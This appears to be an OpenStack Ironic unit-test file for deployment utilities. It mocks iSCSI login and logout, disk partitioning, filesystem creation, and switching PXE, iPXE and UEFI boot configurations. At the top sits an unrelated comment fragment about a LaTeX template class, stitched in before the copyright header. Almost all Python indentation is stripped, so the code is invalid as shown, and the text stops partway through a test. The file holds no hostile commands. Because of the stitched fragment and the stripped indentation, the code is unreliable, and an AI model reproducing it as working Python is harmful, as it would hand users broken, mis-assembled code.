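# module): Template.safe_substitute() fills $PREAMBLE and $SOURCE, so the
# template string is expected to contain those two placeholders.
#
#   tpl = ("\\documentclass{article}\n"
#          "$PREAMBLE\n"
#          "\\begin{document}\n$SOURCE\n\\end{document}\n")
#   content = FileTemplate(tpl, r"\usepackage{tikz}",
#                          r"\tikz \draw (0,0) -- (1,1);").buildFileContent()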

# Copyright (c) 2012 NTT DOCOMO, INC.
# Copyright 2011 OpenStack Foundation
# Copyright 2011 Ilya Alekseyev
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import gzip
import os
import shutil
import stat
import tempfile
import time
import types
import mock
from oslo_concurrency import processutils
from oslo_config import cfg
from oslo_utils import uuidutils
import requests
import testtools
from ironic.common import boot_devices
from ironic.common import disk_partitioner
from ironic.common import exception
from ironic.common import images
from ironic.common import states
from ironic.common import utils as common_utils
from ironic.conductor import task_manager
from ironic.conductor import utils as manager_utils
from ironic.drivers.modules import agent_client
from ironic.drivers.modules import deploy_utils as utils
from ironic.drivers.modules import image_cache
from ironic.tests import base as tests_base
from ironic.tests.conductor import utils as mgr_utils
from ironic.tests.db import base as db_base
from ironic.tests.db import utils as db_utils
from ironic.tests.objects import utils as obj_utils
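# PXE/iPXE/elilo configuration fixtures: each *_DEPLOY template carries the
# {{ ROOT }} and {{ DISK_IDENTIFIER }} placeholders that switch_pxe_config()
# rewrites, while the *_BOOT_PARTITION / *_BOOT_WHOLE_DISK variants are the
# expected results after switching.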
_PXECONF_DEPLOY = b"""
default deploy
label deploy
kernel deploy_kernel
append initrd=deploy_ramdisk
ipappend 3
label boot_partition
kernel kernel
append initrd=ramdisk root={{ ROOT }}
label boot_whole_disk
COM32 chain.c32
append mbr:{{ DISK_IDENTIFIER }}
"""
_PXECONF_BOOT_PARTITION = """
default boot_partition
label deploy
kernel deploy_kernel
append initrd=deploy_ramdisk
ipappend 3
label boot_partition
kernel kernel
append initrd=ramdisk root=UUID=12345678-1234-1234-1234-1234567890abcdef
label boot_whole_disk
COM32 chain.c32
append mbr:{{ DISK_IDENTIFIER }}
"""
_PXECONF_BOOT_WHOLE_DISK = """
default boot_whole_disk
label deploy
kernel deploy_kernel
append initrd=deploy_ramdisk
ipappend 3
label boot_partition
kernel kernel
append initrd=ramdisk root={{ ROOT }}
label boot_whole_disk
COM32 chain.c32
append mbr:0x12345678
"""
_IPXECONF_DEPLOY = b"""
#!ipxe
dhcp
goto deploy
:deploy
kernel deploy_kernel
initrd deploy_ramdisk
boot
:boot_partition
kernel kernel
append initrd=ramdisk root={{ ROOT }}
boot
:boot_whole_disk
kernel chain.c32
append mbr:{{ DISK_IDENTIFIER }}
boot
"""
_IPXECONF_BOOT_PARTITION = """
#!ipxe
dhcp
goto boot_partition
:deploy
kernel deploy_kernel
initrd deploy_ramdisk
boot
:boot_partition
kernel kernel
append initrd=ramdisk root=UUID=12345678-1234-1234-1234-1234567890abcdef
boot
:boot_whole_disk
kernel chain.c32
append mbr:{{ DISK_IDENTIFIER }}
boot
"""
_IPXECONF_BOOT_WHOLE_DISK = """
#!ipxe
dhcp
goto boot_whole_disk
:deploy
kernel deploy_kernel
initrd deploy_ramdisk
boot
:boot_partition
kernel kernel
append initrd=ramdisk root={{ ROOT }}
boot
:boot_whole_disk
kernel chain.c32
append mbr:0x12345678
boot
"""
_UEFI_PXECONF_DEPLOY = b"""
default=deploy
image=deploy_kernel
label=deploy
initrd=deploy_ramdisk
append="ro text"
image=kernel
label=boot_partition
initrd=ramdisk
append="root={{ ROOT }}"
image=chain.c32
label=boot_whole_disk
append="mbr:{{ DISK_IDENTIFIER }}"
"""
_UEFI_PXECONF_BOOT_PARTITION = """
default=boot_partition
image=deploy_kernel
label=deploy
initrd=deploy_ramdisk
append="ro text"
image=kernel
label=boot_partition
initrd=ramdisk
append="root=UUID=12345678-1234-1234-1234-1234567890abcdef"
image=chain.c32
label=boot_whole_disk
append="mbr:{{ DISK_IDENTIFIER }}"
"""
_UEFI_PXECONF_BOOT_WHOLE_DISK = """
default=boot_whole_disk
image=deploy_kernel
label=deploy
initrd=deploy_ramdisk
append="ro text"
image=kernel
label=boot_partition
initrd=ramdisk
append="root={{ ROOT }}"
image=chain.c32
label=boot_whole_disk
append="mbr:0x12345678"
"""
@mock.patch.object(time, 'sleep', lambda seconds: None)
class PhysicalWorkTestCase(tests_base.TestCase):
def _mock_calls(self, name_list):
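        # Patch every named function on `utils` and attach the mocks to one
        # parent MagicMock, so a test can assert the exact cross-helper call
        # order via parent_mock.mock_calls.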
patch_list = [mock.patch.object(utils, name,
spec_set=types.FunctionType)
for name in name_list]
mock_list = [patcher.start() for patcher in patch_list]
for patcher in patch_list:
self.addCleanup(patcher.stop)
parent_mock = mock.MagicMock(spec=[])
for mocker, name in zip(mock_list, name_list):
parent_mock.attach_mock(mocker, name)
return parent_mock
def _test_deploy_partition_image(self, boot_option=None, boot_mode=None):
"""Check loosely all functions are called with right args."""
address = '127.0.0.1'
port = 3306
iqn = 'iqn.xyz'
lun = 1
image_path = '/tmp/xyz/image'
root_mb = 128
swap_mb = 64
ephemeral_mb = 0
ephemeral_format = None
configdrive_mb = 0
node_uuid = "12345678-1234-1234-1234-1234567890abcxyz"
dev = '/dev/fake'
swap_part = '/dev/fake-part1'
root_part = '/dev/fake-part2'
root_uuid = '12345678-1234-1234-12345678-12345678abcdef'
name_list = ['get_dev', 'get_image_mb', 'discovery', 'login_iscsi',
'logout_iscsi', 'delete_iscsi', 'make_partitions',
'is_block_device', 'populate_image', 'mkfs',
'block_uuid', 'notify', 'destroy_disk_metadata']
parent_mock = self._mock_calls(name_list)
parent_mock.get_dev.return_value = dev
parent_mock.get_image_mb.return_value = 1
parent_mock.is_block_device.return_value = True
parent_mock.block_uuid.return_value = root_uuid
parent_mock.make_partitions.return_value = {'root': root_part,
'swap': swap_part}
make_partitions_expected_args = [dev, root_mb, swap_mb, ephemeral_mb,
configdrive_mb]
make_partitions_expected_kwargs = {'commit': True}
deploy_kwargs = {}
if boot_option:
make_partitions_expected_kwargs['boot_option'] = boot_option
deploy_kwargs['boot_option'] = boot_option
else:
make_partitions_expected_kwargs['boot_option'] = 'netboot'
if boot_mode:
make_partitions_expected_kwargs['boot_mode'] = boot_mode
deploy_kwargs['boot_mode'] = boot_mode
else:
make_partitions_expected_kwargs['boot_mode'] = 'bios'
# If no boot_option, then it should default to netboot.
calls_expected = [mock.call.get_image_mb(image_path),
mock.call.get_dev(address, port, iqn, lun),
mock.call.discovery(address, port),
mock.call.login_iscsi(address, port, iqn),
mock.call.is_block_device(dev),
mock.call.destroy_disk_metadata(dev, node_uuid),
mock.call.make_partitions(
*make_partitions_expected_args,
**make_partitions_expected_kwargs),
mock.call.is_block_device(root_part),
mock.call.is_block_device(swap_part),
mock.call.populate_image(image_path, root_part),
mock.call.mkfs(dev=swap_part, fs='swap',
label='swap1'),
mock.call.block_uuid(root_part),
mock.call.logout_iscsi(address, port, iqn),
mock.call.delete_iscsi(address, port, iqn)]
uuids_dict_returned = utils.deploy_partition_image(
address, port, iqn, lun, image_path, root_mb, swap_mb,
ephemeral_mb, ephemeral_format, node_uuid, **deploy_kwargs)
self.assertEqual(calls_expected, parent_mock.mock_calls)
expected_uuid_dict = {
'root uuid': root_uuid,
'efi system partition uuid': None}
self.assertEqual(expected_uuid_dict, uuids_dict_returned)
def test_deploy_partition_image_without_boot_option(self):
self._test_deploy_partition_image()
def test_deploy_partition_image_netboot(self):
self._test_deploy_partition_image(boot_option="netboot")
def test_deploy_partition_image_localboot(self):
self._test_deploy_partition_image(boot_option="local")
def test_deploy_partition_image_wo_boot_option_and_wo_boot_mode(self):
self._test_deploy_partition_image()
def test_deploy_partition_image_netboot_bios(self):
self._test_deploy_partition_image(boot_option="netboot",
boot_mode="bios")
def test_deploy_partition_image_localboot_bios(self):
self._test_deploy_partition_image(boot_option="local",
boot_mode="bios")
def test_deploy_partition_image_netboot_uefi(self):
self._test_deploy_partition_image(boot_option="netboot",
boot_mode="uefi")
@mock.patch.object(utils, 'get_image_mb', return_value=129, autospec=True)
def test_deploy_partition_image_image_exceeds_root_partition(self,
gim_mock):
address = '127.0.0.1'
port = 3306
iqn = 'iqn.xyz'
lun = 1
image_path = '/tmp/xyz/image'
root_mb = 128
swap_mb = 64
ephemeral_mb = 0
ephemeral_format = None
node_uuid = "12345678-1234-1234-1234-1234567890abcxyz"
self.assertRaises(exception.InstanceDeployFailure,
utils.deploy_partition_image, address, port, iqn,
lun, image_path, root_mb, swap_mb, ephemeral_mb,
ephemeral_format, node_uuid)
gim_mock.assert_called_once_with(image_path)
# We mock utils.block_uuid separately here because we can't predict
# the order in which it will be called.
@mock.patch.object(utils, 'block_uuid', autospec=True)
def test_deploy_partition_image_localboot_uefi(self, block_uuid_mock):
"""Check loosely all functions are called with right args."""
address = '127.0.0.1'
port = 3306
iqn = 'iqn.xyz'
lun = 1
image_path = '/tmp/xyz/image'
root_mb = 128
swap_mb = 64
ephemeral_mb = 0
ephemeral_format = None
configdrive_mb = 0
node_uuid = "12345678-1234-1234-1234-1234567890abcxyz"
dev = '/dev/fake'
swap_part = '/dev/fake-part2'
root_part = '/dev/fake-part3'
efi_system_part = '/dev/fake-part1'
root_uuid = '12345678-1234-1234-12345678-12345678abcdef'
efi_system_part_uuid = '9036-482'
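        # The EFI system partition is FAT-formatted, so it reports a short
        # volume serial rather than a full 128-bit UUID.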
name_list = ['get_dev', 'get_image_mb', 'discovery', 'login_iscsi',
'logout_iscsi', 'delete_iscsi', 'make_partitions',
'is_block_device', 'populate_image', 'mkfs',
'notify', 'destroy_disk_metadata']
parent_mock = self._mock_calls(name_list)
parent_mock.get_dev.return_value = dev
parent_mock.get_image_mb.return_value = 1
parent_mock.is_block_device.return_value = True
def block_uuid_side_effect(device):
if device == root_part:
return root_uuid
if device == efi_system_part:
return efi_system_part_uuid
block_uuid_mock.side_effect = block_uuid_side_effect
parent_mock.make_partitions.return_value = {
'root': root_part, 'swap': swap_part,
'efi system partition': efi_system_part}
# If no boot_option, then it should default to netboot.
calls_expected = [mock.call.get_image_mb(image_path),
mock.call.get_dev(address, port, iqn, lun),
mock.call.discovery(address, port),
mock.call.login_iscsi(address, port, iqn),
mock.call.is_block_device(dev),
mock.call.destroy_disk_metadata(dev, node_uuid),
mock.call.make_partitions(dev, root_mb, swap_mb,
ephemeral_mb,
configdrive_mb,
commit=True,
boot_option="local",
boot_mode="uefi"),
mock.call.is_block_device(root_part),
mock.call.is_block_device(swap_part),
mock.call.is_block_device(efi_system_part),
mock.call.mkfs(dev=efi_system_part, fs='vfat',
label='efi-part'),
mock.call.populate_image(image_path, root_part),
mock.call.mkfs(dev=swap_part, fs='swap',
label='swap1'),
mock.call.logout_iscsi(address, port, iqn),
mock.call.delete_iscsi(address, port, iqn)]
uuid_dict_returned = utils.deploy_partition_image(
address, port, iqn, lun, image_path, root_mb, swap_mb,
ephemeral_mb, ephemeral_format, node_uuid, boot_option="local",
boot_mode="uefi")
self.assertEqual(calls_expected, parent_mock.mock_calls)
block_uuid_mock.assert_any_call('/dev/fake-part1')
block_uuid_mock.assert_any_call('/dev/fake-part3')
expected_uuid_dict = {
'root uuid': root_uuid,
'efi system partition uuid': efi_system_part_uuid}
self.assertEqual(expected_uuid_dict, uuid_dict_returned)
def test_deploy_partition_image_without_swap(self):
"""Check loosely all functions are called with right args."""
address = '127.0.0.1'
port = 3306
iqn = 'iqn.xyz'
lun = 1
image_path = '/tmp/xyz/image'
root_mb = 128
swap_mb = 0
ephemeral_mb = 0
ephemeral_format = None
configdrive_mb = 0
node_uuid = "12345678-1234-1234-1234-1234567890abcxyz"
dev = '/dev/fake'
root_part = '/dev/fake-part1'
root_uuid = '12345678-1234-1234-12345678-12345678abcdef'
name_list = ['get_dev', 'get_image_mb', 'discovery', 'login_iscsi',
'logout_iscsi', 'delete_iscsi', 'make_partitions',
'is_block_device', 'populate_image', 'block_uuid',
'notify', 'destroy_disk_metadata']
parent_mock = self._mock_calls(name_list)
parent_mock.get_dev.return_value = dev
parent_mock.get_image_mb.return_value = 1
parent_mock.is_block_device.return_value = True
parent_mock.block_uuid.return_value = root_uuid
parent_mock.make_partitions.return_value = {'root': root_part}
calls_expected = [mock.call.get_image_mb(image_path),
mock.call.get_dev(address, port, iqn, lun),
mock.call.discovery(address, port),
mock.call.login_iscsi(address, port, iqn),
mock.call.is_block_device(dev),
mock.call.destroy_disk_metadata(dev, node_uuid),
mock.call.make_partitions(dev, root_mb, swap_mb,
ephemeral_mb,
configdrive_mb,
commit=True,
boot_option="netboot",
boot_mode="bios"),
mock.call.is_block_device(root_part),
mock.call.populate_image(image_path, root_part),
mock.call.block_uuid(root_part),
mock.call.logout_iscsi(address, port, iqn),
mock.call.delete_iscsi(address, port, iqn)]
uuid_dict_returned = utils.deploy_partition_image(address, port, iqn,
lun, image_path,
root_mb, swap_mb,
ephemeral_mb,
ephemeral_format,
node_uuid)
self.assertEqual(calls_expected, parent_mock.mock_calls)
self.assertEqual(root_uuid, uuid_dict_returned['root uuid'])
def test_deploy_partition_image_with_ephemeral(self):
"""Check loosely all functions are called with right args."""
address = '127.0.0.1'
port = 3306
iqn = 'iqn.xyz'
lun = 1
image_path = '/tmp/xyz/image'
root_mb = 128
swap_mb = 64
ephemeral_mb = 256
configdrive_mb = 0
ephemeral_format = 'exttest'
node_uuid = "12345678-1234-1234-1234-1234567890abcxyz"
dev = '/dev/fake'
ephemeral_part = '/dev/fake-part1'
swap_part = '/dev/fake-part2'
root_part = '/dev/fake-part3'
root_uuid = '12345678-1234-1234-12345678-12345678abcdef'
name_list = ['get_dev', 'get_image_mb', 'discovery', 'login_iscsi',
'logout_iscsi', 'delete_iscsi', 'make_partitions',
'is_block_device', 'populate_image', 'mkfs',
'block_uuid', 'notify', 'destroy_disk_metadata']
parent_mock = self._mock_calls(name_list)
parent_mock.get_dev.return_value = dev
parent_mock.get_image_mb.return_value = 1
parent_mock.is_block_device.return_value = True
parent_mock.block_uuid.return_value = root_uuid
parent_mock.make_partitions.return_value = {'swap': swap_part,
'ephemeral': ephemeral_part,
'root': root_part}
calls_expected = [mock.call.get_image_mb(image_path),
mock.call.get_dev(address, port, iqn, lun),
mock.call.discovery(address, port),
mock.call.login_iscsi(address, port, iqn),
mock.call.is_block_device(dev),
mock.call.destroy_disk_metadata(dev, node_uuid),
mock.call.make_partitions(dev, root_mb, swap_mb,
ephemeral_mb,
configdrive_mb,
commit=True,
boot_option="netboot",
boot_mode="bios"),
mock.call.is_block_device(root_part),
mock.call.is_block_device(swap_part),
mock.call.is_block_device(ephemeral_part),
mock.call.populate_image(image_path, root_part),
mock.call.mkfs(dev=swap_part, fs='swap',
label='swap1'),
mock.call.mkfs(dev=ephemeral_part,
fs=ephemeral_format,
label='ephemeral0'),
mock.call.block_uuid(root_part),
mock.call.logout_iscsi(address, port, iqn),
mock.call.delete_iscsi(address, port, iqn)]
uuid_dict_returned = utils.deploy_partition_image(address, port, iqn,
lun, image_path,
root_mb, swap_mb,
ephemeral_mb,
ephemeral_format,
node_uuid)
self.assertEqual(calls_expected, parent_mock.mock_calls)
self.assertEqual(root_uuid, uuid_dict_returned['root uuid'])
def test_deploy_partition_image_preserve_ephemeral(self):
"""Check if all functions are called with right args."""
address = '127.0.0.1'
port = 3306
iqn = 'iqn.xyz'
lun = 1
image_path = '/tmp/xyz/image'
root_mb = 128
swap_mb = 64
ephemeral_mb = 256
ephemeral_format = 'exttest'
configdrive_mb = 0
node_uuid = "12345678-1234-1234-1234-1234567890abcxyz"
dev = '/dev/fake'
ephemeral_part = '/dev/fake-part1'
swap_part = '/dev/fake-part2'
root_part = '/dev/fake-part3'
root_uuid = '12345678-1234-1234-12345678-12345678abcdef'
name_list = ['get_dev', 'get_image_mb', 'discovery', 'login_iscsi',
'logout_iscsi', 'delete_iscsi', 'make_partitions',
'is_block_device', 'populate_image', 'mkfs',
'block_uuid', 'notify', 'get_dev_block_size']
parent_mock = self._mock_calls(name_list)
parent_mock.get_dev.return_value = dev
parent_mock.get_image_mb.return_value = 1
parent_mock.is_block_device.return_value = True
parent_mock.block_uuid.return_value = root_uuid
parent_mock.make_partitions.return_value = {'swap': swap_part,
'ephemeral': ephemeral_part,
'root': root_part}
parent_mock.block_uuid.return_value = root_uuid
calls_expected = [mock.call.get_image_mb(image_path),
mock.call.get_dev(address, port, iqn, lun),
mock.call.discovery(address, port),
mock.call.login_iscsi(address, port, iqn),
mock.call.is_block_device(dev),
mock.call.make_partitions(dev, root_mb, swap_mb,
ephemeral_mb,
configdrive_mb,
commit=False,
boot_option="netboot",
boot_mode="bios"),
mock.call.is_block_device(root_part),
mock.call.is_block_device(swap_part),
mock.call.is_block_device(ephemeral_part),
mock.call.populate_image(image_path, root_part),
mock.call.mkfs(dev=swap_part, fs='swap',
label='swap1'),
mock.call.block_uuid(root_part),
mock.call.logout_iscsi(address, port, iqn),
mock.call.delete_iscsi(address, port, iqn)]
uuid_dict_returned = utils.deploy_partition_image(
address, port, iqn, lun, image_path, root_mb, swap_mb,
ephemeral_mb, ephemeral_format, node_uuid,
preserve_ephemeral=True, boot_option="netboot")
self.assertEqual(calls_expected, parent_mock.mock_calls)
self.assertFalse(parent_mock.get_dev_block_size.called)
self.assertEqual(root_uuid, uuid_dict_returned['root uuid'])
@mock.patch.object(common_utils, 'unlink_without_raise', autospec=True)
def test_deploy_partition_image_with_configdrive(self, mock_unlink):
"""Check loosely all functions are called with right args."""
address = '127.0.0.1'
port = 3306
iqn = 'iqn.xyz'
lun = 1
image_path = '/tmp/xyz/image'
root_mb = 128
swap_mb = 0
ephemeral_mb = 0
configdrive_mb = 10
ephemeral_format = None
node_uuid = "12345678-1234-1234-1234-1234567890abcxyz"
configdrive_url = 'http://127.0.0.1/cd'
dev = '/dev/fake'
configdrive_part = '/dev/fake-part1'
root_part = '/dev/fake-part2'
root_uuid = '12345678-1234-1234-12345678-12345678abcdef'
name_list = ['get_dev', 'get_image_mb', 'discovery', 'login_iscsi',
'logout_iscsi', 'delete_iscsi', 'make_partitions',
'is_block_device', 'populate_image', 'block_uuid',
'notify', 'destroy_disk_metadata', 'dd',
'_get_configdrive']
parent_mock = self._mock_calls(name_list)
parent_mock.get_dev.return_value = dev
parent_mock.get_image_mb.return_value = 1
parent_mock.is_block_device.return_value = True
parent_mock.block_uuid.return_value = root_uuid
parent_mock.make_partitions.return_value = {'root': root_part,
'configdrive':
configdrive_part}
parent_mock._get_configdrive.return_value = (10, 'configdrive-path')
calls_expected = [mock.call.get_image_mb(image_path),
mock.call.get_dev(address, port, iqn, lun),
mock.call.discovery(address, port),
mock.call.login_iscsi(address, port, iqn),
mock.call.is_block_device(dev),
mock.call.destroy_disk_metadata(dev, node_uuid),
mock.call._get_configdrive(configdrive_url,
node_uuid),
mock.call.make_partitions(dev, root_mb, swap_mb,
ephemeral_mb,
configdrive_mb,
commit=True,
boot_option="netboot",
boot_mode="bios"),
mock.call.is_block_device(root_part),
mock.call.is_block_device(configdrive_part),
mock.call.dd(mock.ANY, configdrive_part),
mock.call.populate_image(image_path, root_part),
mock.call.block_uuid(root_part),
mock.call.logout_iscsi(address, port, iqn),
mock.call.delete_iscsi(address, port, iqn)]
uuid_dict_returned = utils.deploy_partition_image(
address, port, iqn, lun, image_path, root_mb, swap_mb,
ephemeral_mb, ephemeral_format, node_uuid,
configdrive=configdrive_url)
self.assertEqual(calls_expected, parent_mock.mock_calls)
self.assertEqual(root_uuid, uuid_dict_returned['root uuid'])
mock_unlink.assert_called_once_with('configdrive-path')
@mock.patch.object(utils, 'get_disk_identifier', autospec=True)
def test_deploy_whole_disk_image(self, mock_gdi):
"""Check loosely all functions are called with right args."""
address = '127.0.0.1'
port = 3306
iqn = 'iqn.xyz'
lun = 1
image_path = '/tmp/xyz/image'
node_uuid = "12345678-1234-1234-1234-1234567890abcxyz"
dev = '/dev/fake'
name_list = ['get_dev', 'discovery', 'login_iscsi', 'logout_iscsi',
'delete_iscsi', 'is_block_device', 'populate_image',
'notify']
parent_mock = self._mock_calls(name_list)
parent_mock.get_dev.return_value = dev
parent_mock.is_block_device.return_value = True
mock_gdi.return_value = '0x12345678'
calls_expected = [mock.call.get_dev(address, port, iqn, lun),
mock.call.discovery(address, port),
mock.call.login_iscsi(address, port, iqn),
mock.call.is_block_device(dev),
mock.call.populate_image(image_path, dev),
mock.call.logout_iscsi(address, port, iqn),
mock.call.delete_iscsi(address, port, iqn)]
uuid_dict_returned = utils.deploy_disk_image(address, port, iqn, lun,
image_path, node_uuid)
self.assertEqual(calls_expected, parent_mock.mock_calls)
self.assertEqual('0x12345678', uuid_dict_returned['disk identifier'])
@mock.patch.object(common_utils, 'execute', autospec=True)
def test_verify_iscsi_connection_raises(self, mock_exec):
iqn = 'iqn.xyz'
mock_exec.return_value = ['iqn.abc', '']
self.assertRaises(exception.InstanceDeployFailure,
utils.verify_iscsi_connection, iqn)
self.assertEqual(3, mock_exec.call_count)
@mock.patch.object(os.path, 'exists', autospec=True)
def test_check_file_system_for_iscsi_device_raises(self, mock_os):
iqn = 'iqn.xyz'
ip = "127.0.0.1"
port = "22"
mock_os.return_value = False
self.assertRaises(exception.InstanceDeployFailure,
utils.check_file_system_for_iscsi_device, ip, port, iqn)
self.assertEqual(3, mock_os.call_count)
@mock.patch.object(os.path, 'exists', autospec=True)
def test_check_file_system_for_iscsi_device(self, mock_os):
iqn = 'iqn.xyz'
ip = "127.0.0.1"
port = "22"
check_dir = "/dev/disk/by-path/ip-%s:%s-iscsi-%s-lun-1" % (ip,
port,
iqn)
mock_os.return_value = True
utils.check_file_system_for_iscsi_device(ip, port, iqn)
mock_os.assert_called_once_with(check_dir)
@mock.patch.object(common_utils, 'execute', autospec=True)
def test_verify_iscsi_connection(self, mock_exec):
iqn = 'iqn.xyz'
mock_exec.return_value = ['iqn.xyz', '']
utils.verify_iscsi_connection(iqn)
mock_exec.assert_called_once_with('iscsiadm',
'-m', 'node',
'-S',
run_as_root=True,
check_exit_code=[0])
@mock.patch.object(common_utils, 'execute', autospec=True)
def test_force_iscsi_lun_update(self, mock_exec):
iqn = 'iqn.xyz'
utils.force_iscsi_lun_update(iqn)
mock_exec.assert_called_once_with('iscsiadm',
'-m', 'node',
'-T', iqn,
'-R',
run_as_root=True,
check_exit_code=[0])
@mock.patch.object(common_utils, 'execute', autospec=True)
@mock.patch.object(utils, 'verify_iscsi_connection', autospec=True)
@mock.patch.object(utils, 'force_iscsi_lun_update', autospec=True)
@mock.patch.object(utils, 'check_file_system_for_iscsi_device',
autospec=True)
def test_login_iscsi_calls_verify_and_update(self,
mock_check_dev,
mock_update,
mock_verify,
mock_exec):
address = '127.0.0.1'
port = 3306
iqn = 'iqn.xyz'
mock_exec.return_value = ['iqn.xyz', '']
utils.login_iscsi(address, port, iqn)
mock_exec.assert_called_once_with('iscsiadm',
'-m', 'node',
'-p', '%s:%s' % (address, port),
'-T', iqn,
'--login',
run_as_root=True,
check_exit_code=[0],
attempts=5,
delay_on_retry=True)
mock_verify.assert_called_once_with(iqn)
mock_update.assert_called_once_with(iqn)
mock_check_dev.assert_called_once_with(address, port, iqn)
@mock.patch.object(utils, 'is_block_device', lambda d: True)
def test_always_logout_and_delete_iscsi(self):
"""Check if logout_iscsi() and delete_iscsi() are called.
Make sure that logout_iscsi() and delete_iscsi() are called once
login_iscsi() is invoked.
"""
address = '127.0.0.1'
port = 3306
iqn = 'iqn.xyz'
lun = 1
image_path = '/tmp/xyz/image'
root_mb = 128
swap_mb = 64
ephemeral_mb = 256
ephemeral_format = 'exttest'
node_uuid = "12345678-1234-1234-1234-1234567890abcxyz"
dev = '/dev/fake'
class TestException(Exception):
pass
name_list = ['get_dev', 'get_image_mb', 'discovery', 'login_iscsi',
'logout_iscsi', 'delete_iscsi', 'work_on_disk']
patch_list = [mock.patch.object(utils, name,
spec_set=types.FunctionType)
for name in name_list]
mock_list = [patcher.start() for patcher in patch_list]
for patcher in patch_list:
self.addCleanup(patcher.stop)
parent_mock = mock.MagicMock(spec=[])
for mocker, name in zip(mock_list, name_list):
parent_mock.attach_mock(mocker, name)
parent_mock.get_dev.return_value = dev
parent_mock.get_image_mb.return_value = 1
parent_mock.work_on_disk.side_effect = TestException
calls_expected = [mock.call.get_image_mb(image_path),
mock.call.get_dev(address, port, iqn, lun),
mock.call.discovery(address, port),
mock.call.login_iscsi(address, port, iqn),
mock.call.work_on_disk(dev, root_mb, swap_mb,
ephemeral_mb,
ephemeral_format, image_path,
node_uuid, configdrive=None,
preserve_ephemeral=False,
boot_option="netboot",
boot_mode="bios"),
mock.call.logout_iscsi(address, port, iqn),
mock.call.delete_iscsi(address, port, iqn)]
self.assertRaises(TestException, utils.deploy_partition_image,
address, port, iqn, lun, image_path,
root_mb, swap_mb, ephemeral_mb, ephemeral_format,
node_uuid)
self.assertEqual(calls_expected, parent_mock.mock_calls)
class SwitchPxeConfigTestCase(tests_base.TestCase):
def _create_config(self, ipxe=False, boot_mode=None):
(fd, fname) = tempfile.mkstemp()
if boot_mode == 'uefi':
pxe_cfg = _UEFI_PXECONF_DEPLOY
else:
pxe_cfg = _IPXECONF_DEPLOY if ipxe else _PXECONF_DEPLOY
os.write(fd, pxe_cfg)
os.close(fd)
self.addCleanup(os.unlink, fname)
return fname
def test_switch_pxe_config_partition_image(self):
boot_mode = 'bios'
fname = self._create_config()
utils.switch_pxe_config(fname,
'12345678-1234-1234-1234-1234567890abcdef',
boot_mode,
False)
with open(fname, 'r') as f:
pxeconf = f.read()
self.assertEqual(_PXECONF_BOOT_PARTITION, pxeconf)
def test_switch_pxe_config_whole_disk_image(self):
boot_mode = 'bios'
fname = self._create_config()
utils.switch_pxe_config(fname,
'0x12345678',
boot_mode,
True)
with open(fname, 'r') as f:
pxeconf = f.read()
self.assertEqual(_PXECONF_BOOT_WHOLE_DISK, pxeconf)
def test_switch_ipxe_config_partition_image(self):
boot_mode = 'bios'
cfg.CONF.set_override('ipxe_enabled', True, 'pxe')
fname = self._create_config(ipxe=True)
utils.switch_pxe_config(fname,
'12345678-1234-1234-1234-1234567890abcdef',
boot_mode,
False)
with open(fname, 'r') as f:
pxeconf = f.read()
self.assertEqual(_IPXECONF_BOOT_PARTITION, pxeconf)
def test_switch_ipxe_config_whole_disk_image(self):
boot_mode = 'bios'
cfg.CONF.set_override('ipxe_enabled', True, 'pxe')
fname = self._create_config(ipxe=True)
utils.switch_pxe_config(fname,
'0x12345678',
boot_mode,
True)
with open(fname, 'r') as f:
pxeconf = f.read()
self.assertEqual(_IPXECONF_BOOT_WHOLE_DISK, pxeconf)
def test_switch_uefi_pxe_config_partition_image(self):
boot_mode = 'uefi'
fname = self._create_config(boot_mode=boot_mode)
utils.switch_pxe_config(fname,
'12345678-1234-1234-1234-1234567890abcdef',
boot_mode,
False)
with open(fname, 'r') as f:
pxeconf = f.read()
self.assertEqual(_UEFI_PXECONF_BOOT_PARTITION, pxeconf)
def test_switch_uefi_config_whole_disk_image(self):
boot_mode = 'uefi'
fname = self._create_config(boot_mode=boot_mode)
utils.switch_pxe_config(fname,
'0x12345678',
boot_mode,
True)
with open(fname, 'r') as f:
pxeconf = f.read()
self.assertEqual(_UEFI_PXECONF_BOOT_WHOLE_DISK, pxeconf)
@mock.patch('time.sleep', lambda sec: None)
class OtherFunctionTestCase(db_base.DbTestCase):
def setUp(self):
super(OtherFunctionTestCase, self).setUp()
mgr_utils.mock_the_extension_manager(driver="fake_pxe")
self.node = obj_utils.create_test_node(self.context, driver='fake_pxe')
def test_get_dev(self):
expected = '/dev/disk/by-path/ip-127.0.0.1:5678-iscsi-iqn.fake-lun-9'
actual = utils.get_dev('127.0.0.1', 5678, 'iqn.fake', 9)
self.assertEqual(expected, actual)
@mock.patch.object(os, 'stat', autospec=True)
@mock.patch.object(stat, 'S_ISBLK', autospec=True)
def test_is_block_device_works(self, mock_is_blk, mock_os):
device = '/dev/disk/by-path/ip-127.0.0.1:5678-iscsi-iqn.fake-lun-9'
mock_is_blk.return_value = True
mock_os().st_mode = 10000
self.assertTrue(utils.is_block_device(device))
mock_is_blk.assert_called_once_with(mock_os().st_mode)
@mock.patch.object(os, 'stat', autospec=True)
def test_is_block_device_raises(self, mock_os):
device = '/dev/disk/by-path/ip-127.0.0.1:5678-iscsi-iqn.fake-lun-9'
mock_os.side_effect = OSError
self.assertRaises(exception.InstanceDeployFailure,
utils.is_block_device, device)
mock_os.assert_has_calls([mock.call(device)] * 3)
@mock.patch.object(os.path, 'getsize', autospec=True)
@mock.patch.object(images, 'converted_size', autospec=True)
def test_get_image_mb(self, mock_csize, mock_getsize):
mb = 1024 * 1024
mock_getsize.return_value = 0
mock_csize.return_value = 0
self.assertEqual(0, utils.get_image_mb('x', False))
self.assertEqual(0, utils.get_image_mb('x', True))
mock_getsize.return_value = 1
mock_csize.return_value = 1
self.assertEqual(1, utils.get_image_mb('x', False))
self.assertEqual(1, utils.get_image_mb('x', True))
mock_getsize.return_value = mb
mock_csize.return_value = mb
self.assertEqual(1, utils.get_image_mb('x', False))
self.assertEqual(1, utils.get_image_mb('x', True))
mock_getsize.return_value = mb + 1
mock_csize.return_value = mb + 1
self.assertEqual(2, utils.get_image_mb('x', False))
self.assertEqual(2, utils.get_image_mb('x', True))
def test_parse_root_device_hints(self):
self.node.properties['root_device'] = {'wwn': 123456}
expected = 'wwn=123456'
result = utils.parse_root_device_hints(self.node)
